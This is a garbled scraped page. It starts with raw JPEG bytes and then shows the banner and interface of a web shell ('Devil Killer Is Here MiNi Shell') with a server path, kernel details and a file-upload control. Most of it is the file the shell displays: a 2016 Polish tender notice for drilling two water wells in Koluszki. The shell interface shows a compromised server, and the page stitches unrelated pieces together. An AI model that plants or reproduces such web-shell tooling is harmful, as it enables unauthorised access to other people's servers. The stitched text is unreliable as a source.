JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160629/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160629/109443-N-2016.html

<p class="kh_header"><b>Koluszki: Wykonanie ujęcia wód podziemnych - studni nr 4 i 5 ujmujący czwartorzędowy poziom wodonośny na terenie SUW Koluszki</b><br>
<b>Numer ogłoszenia: 109443 - 2016; data zamieszczenia: 29.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Koluszkowskie Przedsiębiorstwo Gospodarki Komunalnej Sp. z o.o. , ul. Mickiewicza 4, 95-040 Koluszki, woj. łódzkie, tel. 044 7145845, faks 044 7146554.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie ujęcia wód podziemnych - studni nr 4 i 5 ujmujący czwartorzędowy poziom wodonośny na terenie SUW Koluszki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie ujęcia wód podziemnych - studni nr 4 i 5 ujmujący czwartorzędowy poziom wodonośny na terenie SUW Koluszki,
   w tym:
a)	opracować harmonogram realizacji robót;
b)	wykonać dwa otworu studzienne nr 4 i 5. Otwory wykonać metodą mechaniczno-udarowo-okrętną. 
c)	Przebieg prac oraz konstrukcję otworu nr 4 przeprowadzić należy  następująco:
- W pierwszym wiercenie prowadzić w rurach roboczych fi 20 do głębokości 20 m.
- Od głębokości 20,0 m do 50 m w rurach roboczych fi 18.
- Zmienić kolumnę rur roboczych na fi 16 i wiercenie prowadzić do końcowej głębokości, tj. 73 m.
- Po zakończeniu wiercenia do otworu należy opuścić filtr kolumnowy na głębokość 73 m o następujących wymiarach:
- rura podfiltrowa PCV fi 280 mm  dług. -   3,0 m,
- filtr z rury perforowanej PCV fi 280 mm, siatkowy dług. - 14,0 m,
- redukcja z fi 280/315 mm dług. -     0,5 m,
- rura nadfiltrowa PCV fi 280 mm dług.  -    55,5 m
- Po zabudowaniu filtra w otworze wykonać obsypkę żwirową, której granulację dobierze dozór geologiczny. 
- W otworze do głębokości 45 m wykonać obsypkę żwirową, od głębokości 45 m do 11 m wykonać uszczelnienie urobkiem piaszczystym, od 11 m do 9 m uszczelnienie kompaktonitem, a od 9 m do powierzchni terenu mleczkiem iłowym.
- Wyciągnąć z otworu rury robocze fi 20, 18 i 16.
- Po zakończeniu wiercenia do otworu opuścić na głębokość ca 54 m pt. pompę głębinową umożliwiającą uzyskanie wydajności min. 50m3na godzinę.
 d)  Przebieg prac oraz konstrukcję otworu nr 5 przeprowadzić należy            następująco:
- W pierwszym wiercenie prowadzić w rurach roboczych fi 20 do głębokości 20 m.
- Od głębokości 20,0 m do 50 m w rurach roboczych fi 18.
- Zmienić kolumnę rur roboczych na fi 16 i wiercenie prowadzić do  końcowej głębokości, tj. 73 m.
- Po zakończeniu wiercenia do otworu należy opuścić filtr kolumnowy na
          głębokość 73 m o następujących wymiarach:
- rura podfiltrowa PCV fi 280 mm 	dług. -   3,0 m,
- filtr z rury perforowanej PCV fi 280 mm, siatkowy dług. -   15,0 m,
- redukcja z fi 280/315 mm	dług. -     0,5 m,
- rura nadfiltrowa PCV fi 280 mm	dług.  -    54,5 m
- Po zabudowaniu filtra w otworze wykonać obsypkę żwirową, której granulację dobierze dozór geologiczny.
- W otworze do głębokości 45 m wykonać obsypkę żwirową, od głębokości 45 m do 6 m wykonać uszczelnienie urobkiem piaszczystym, od 6 m do 4 m uszczelnienie kompaktonitem, a od 4 m do powierzchni terenu mleczkiem iłowym.
- Wyciągnąć z otworu rury robocze fi 20, 18 i 16.
- Po zakończeniu wiercenia do otworu opuścić na głębokość ca 53 m pt. pompę głębinową umożliwiającą uzyskanie wydajności min. 60m3na godzinę.
e)   wykonanie obudowy otworu studziennego - 2 szt.
f)  budowę instalacji wodociągowej i elektrycznej należy zrealizować w trybie   
    zaprojektuj i wybuduj, tj.:
1. Instalacje wodociągowe studni nr 4 i nr 5:
- włączenie przewodu wodociągowego ze studni nr 4 w istniejący przewód wodociągowy łączący studnię nr 2 z SUW Koluszki ( na działce nr ewid. 21 obr. 3 m. Koluszki ul. Polna 25). Połączenie zrealizować w bezpośrednim sąsiedztwie studni nr 2. Na wyjściu ze studni  nr 4 zamontować wodomierz mechaniczny i przepływomierz ultradźwiękowy.
- włączenie przewodu wodociągowego ze studni nr 5 w istniejący przewód wodociągowy łączący studnię nr 3 z SUW Koluszki ( na działce nr ewid. 16łamane przez 3 obr. 3 m. Koluszki ul. Zielona). Połączenie zrealizować w bezpośrednim sąsiedztwie studni nr 3. Na wyjściu ze studni nr 5 zamontować wodomierz mechaniczny i przepływomierz ultradźwiękowy.

2. Instalacje zasilania energetycznego studni nr 4 i nr 5:
- włączenie instalacji energetycznej zasilającej studnię nr 4 w istniejące
   przyłącze energetyczne zasilające studnię nr 2( na działce nr ewid. 21   
   obr. 3 m. Koluszki, ul. Polna 25).
- włączenie instalacji energetycznej zasilającej studnię nr 5 w istniejące 
   przyłącze energetyczne zasilające studnię nr 3( na działce nr ewid.
  16 łamane przez 3 obr. 3 m. Koluszki  ul. Zielona).

3. Instalacje automatyki sterowania pompami nr 4 i nr 5:
-  realizacja za pomocą modułu telemetrycznego MT 101, 
-  praca automatyczna uzależniona od poziomów wody w istniejących  
   zbiornikach   retencyjnych,
- niezależne sterowanie w trybie ręcznym umiejscowione 
      w pomieszczeniu sterowni i w szafie sterowniczej przy studni,
-  wizualizacja wydajności wydobycia pompy ze studni nr 4 i nr 5 
      umiejscowione w pomieszczeniu sterowni,
-   możliwość zadawania parametrów pracy pompy  studni nr 4 i nr 5 
      umiejscowione  w pomieszczeniu sterowni,
-    wizualizacja wskazań wodomierza przepływowego ze studni nr 4 i nr   
      5 usytuowana   w sterowni,
-  instalacja układu automatyki niezależna dla każdej ze studni.

4. Projekty wszystkich instalacji poprzeć obliczeniami. Po wykonaniu w/w instalacji przeprowadzić badania umożliwiające dopuszczenie do eksploatacji zgodnie z obowiązującymi przepisami prawa i normami.
         g) wbudowanie materiałów budowlanych i armatury fabrycznie nowej, która
      posiada Aprobaty Techniczne,
         h) wykonanie obsługi geodezyjnej w zakresie tyczenia i inwentaryzacji
      geodezyjnej  powykonawczej,
         i) uporządkowanie terenu budowy i przekazanie Zamawiającemu terenu
      budow,.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>zgodnie z art. 67 ust. 1 pkt. 6 ustawy Pzp</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.44.45.00-0, 45.11.12.91-4, 45.23.11.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 5000,00 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	O zamówienie mogą ubiegać się Wykonawcy, którzy:
1)	nie podlegają wykluczeniu z postępowania na podstawie art. 24 u. p. z. p.,
2)	spełniają warunki udziału w postępowaniu określone w art. 22 ust. 1 u. p. z. p.,
2.	Wykonawcy ubiegający się o zamówienie publiczne muszą spełniać niżej wymienione warunki udziału w postępowaniu:
1) Posiadać uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.
W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy są zobowiązani przedłożyć: oświadczenia o spełnianiu przez Wykonawcę warunków, udziału w postępowaniu z art. 22 ust 1 u. p. z. p., sporządzone według wzoru stanowiącego załącznik nr 2 do IDW, 
(w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wskazywać będą spełnienie tego warunku)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym celu Wykonawca musi wykazać, iż wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej 2 zamówienia polegające na odwierceniu studni i montażu obudowy studziennej o wartości robót budowlanych nie mniejszej niż 100.000,00 PLN (z VAT), każde z nich.  

W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy są zobowiązani przedłożyć: 
a.	oświadczenia o spełnianiu przez Wykonawcę warunków, udziału 
w postępowaniu z art. 22 ust 1 u. p. z. p., sporządzone według wzoru stanowiącego załącznik nr 2 do IDW, (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, dokument ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wskazywać będą spełnienie tego warunku);
b.	wykaz robót budowlanych w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, z podaniem ich rodzaju            i wartości, daty i miejsca wykonania - sporządzony na podstawie wzoru stanowiącego załącznik nr 5 do IDW (W przypadku  wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna wiedza i doświadczenie w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wskazywać będą spełnienie tego warunku);
c.	dokumenty potwierdzające, że roboty ujęte w wykazie zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. (W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna wiedza i doświadczenie w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wskazywać będą spełnienie tego warunku);
d.	jeżeli Wykonawca polega na wiedzy i doświadczeniu innych podmiotów, zobowiązany jest przedstawić (zgodnie z art. 26 ust. 2 b u. p. z. p.), pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji wymaganych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - sporządzone na podstawie wzoru stanowiącego załącznik nr 6 do IDW.
e.	jeżeli Wykonawca polega na wiedzy i doświadczeniu innych podmiotów to dokumenty, o których mowa powyżej w ppkt. c) winny być wystawione na ten podmiot.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku dysponowania potencjałem technicznym Wykonawcy są zobowiązani przedłożyć:
    a)  oświadczenie o spełnianiu przez Wykonawcę warunków, udziału                 w postępowaniu z art. 22 ust 1 u. p. z. p., sporządzone według wzoru stanowiącego załącznik nr 2 do IDW, (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wskazywać będą spełnienie tego warunku)
b)  w przypadku gdy Wykonawca będzie polegał na potencjale technicznym innych podmiotów zobowiązany jest przedłożyć pisemne zobowiązanie tych podmiotów  (zgodnie z art. 26 ust. 2b u. p z. p.), do oddania mu do dyspozycji potencjału technicznego - sporządzone na podstawie wzoru stanowiącego załącznik nr 9 do IDW</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym celu Wykonawca wskaże do wykonania niniejszego zamówienia następujące osoby wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, 
a także wskaże zakres wykonywanych przez nich czynności oraz informację o podstawie do dysponowania tymi osobami:
     Kierownik Budowy - ( 1 osoba) - posiadający co najmniej 3 lata doświadczenia zawodowego, w kierowaniu robotami geologicznymi przy odwierceniu studni i montażu obudowy studziennej  (po uzyskaniu uprawnień). 
Kierownik Budowy winien posiadać uprawnienia do wykonywania prac geologicznych.
           Kierownik Robót sanitarnych - 1 osoba), posiadający co najmniej 3 lata   
           doświadczenia zawodowego, w zakresie nadzoru nad robotami budowlanymi
           na terenie stacji uzdatniania wody  (po uzyskaniu uprawnień). 
Kierownik Robót sanitarnych winien posiadać uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń  uprawniające do kierowania robotami budowlanymi lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów - w zakresie wystarczającym do kierowania robotami budowlanymi objętymi niniejszym postępowaniem, z zastrzeżeniem niżej wymienionych punktów A, B i C.
 A. Uprawnienia, o których mowa powyżej powinny być zgodne z ustawą z dnia 7 lipca 1994r. Prawo budowlane (Dz. U. z 2006, nr 156, poz.1118 ze zm.) oraz Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006, nr 83, poz. 578 ze zm.).
B. Dopuszcza się uprawnienia równoważne - dla osoby, która posiada uzyskane przed dniem wejścia w życie ustawy z dnia 7 lipca 1994r. Prawo budowlane, uprawnienia lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji w budownictwie i zachowała uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie.
C. W przypadku wykonawców zagranicznych, dopuszcza się równoważne
 kwalifikacje, zdobyte w innych państwach, na zasadach określonych w art.    12a ustawy z dnia 7 lipca 1994r. Prawo budowlane, z uwzględnieniem postanowień ustawy z dnia 18 marca 2008r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2008, nr 63,  poz. 394 ze zm.).
           Kierownik Robót Elektrycznych i AKPiA  - (1 osoba) - posiadający co
           najmniej 3 lata doświadczenia zawodowego w zakresie nadzoru nad robotami
           budowlanymi (po uzyskaniu uprawnień).
Kierownik Robót Elektrycznych winien posiadać uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń  uprawniające do kierowania robotami budowlanymi lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów - w zakresie wystarczającym do nadzoru robót budowlanych (elektrycznych)  objętych niniejszym postępowaniem, z zastrzeżeniem niżej wymienionych punktów A, B i C.
 A. Uprawnienia, o których mowa powyżej powinny być zgodne z ustawą z dnia 7 lipca 1994r. Prawo budowlane (Dz. U. z 2006, nr 156, poz.1118 ze zm.) oraz Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006, nr 83, poz. 578 ze zm.).
B. Dopuszcza się uprawnienia równoważne - dla osoby, która posiada uzyskane przed dniem wejścia w życie ustawy z dnia 7 lipca 1994r. Prawo budowlane, uprawnienia lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji w budownictwie i zachowała uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie.
C. W przypadku wykonawców zagranicznych, dopuszcza się równoważne
 kwalifikacje, zdobyte w innych państwach, na zasadach określonych w art.    12a ustawy z dnia 7 lipca 1994r. Prawo budowlane, z uwzględnieniem postanowień ustawy z dnia 18 marca 2008r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2008, nr 63,  poz. 394 ze zm.).

W celu potwierdzenia spełnienia warunku dysponowania osobami Wykonawcy są zobowiązani przedłożyć:
a)	wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia 
w szczególności odpowiedzialnych za kierowanie robotami budowlanymi wraz w informacjami na temat ich kwalifikacji zawodowych                        i doświadczenia niezbędnego do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności, sporządzony według wzoru stanowiącego załącznik nr 8 do niniejszej IDW (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców                   o udzielenie niniejszego zamówienia, dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wskazywać będą spełnienie tego warunku);
b)	oświadczenie o spełnianiu przez Wykonawcę warunków, udziału            w postępowaniu z art. 22 ust 1  u. p. z. p., sporządzone według wzoru stanowiącego załącznik nr 2 do IDW, (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wskazywać będą spełnienie tego warunku);
c)	w przypadku, gdy wskazane w załączniku nr 8 do niniejszej IDW osoby, to osoby, którymi Wykonawca będzie dysponował od innych podmiotów, Wykonawca zobowiązany jest przedłożyć pisemne zobowiązanie tych podmiotów (zgodnie z art. 26 ust. 2b u. p z. p.), do oddania mu do dyspozycji Kierownika Budowy, Kierowników Robót, który (którzy) posiada(ją) wymagane uprawnienia przy wykonywaniu zamówienia - sporządzone na podstawie wzoru stanowiącego załącznik nr 7a do IDW;
d)	do w/w dokumentów należy załączyć oświadczenia, że osoby które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia sporządzone na podstawie wzoru stanowiącego załącznik 
nr 7b do IDW (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wskazywać będą spełnienie tego warunku)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy są zobowiązani przedłożyć: 
a)	oświadczenia o spełnianiu przez Wykonawcę warunków, udziału 
w postępowaniu z art. 22 ust 1 pkt. 1-4 u. p. z. p., sporządzone według wzoru stanowiącego załącznik nr 2 do IDW, (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wskazywać będą spełnienie tego warunku)
b)	w przypadku, gdy Wykonawca będzie polegał na zdolności finansowej innych podmiotów zobowiązany jest przedłożyć pisemne zobowiązanie tych podmiotów (zgodnie z art. 26 ust. 2b u. p z. p.), do oddania mu do dyspozycji tych zasobów - sporządzone na podstawie wzoru stanowiącego załącznik nr 10 do IDW</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

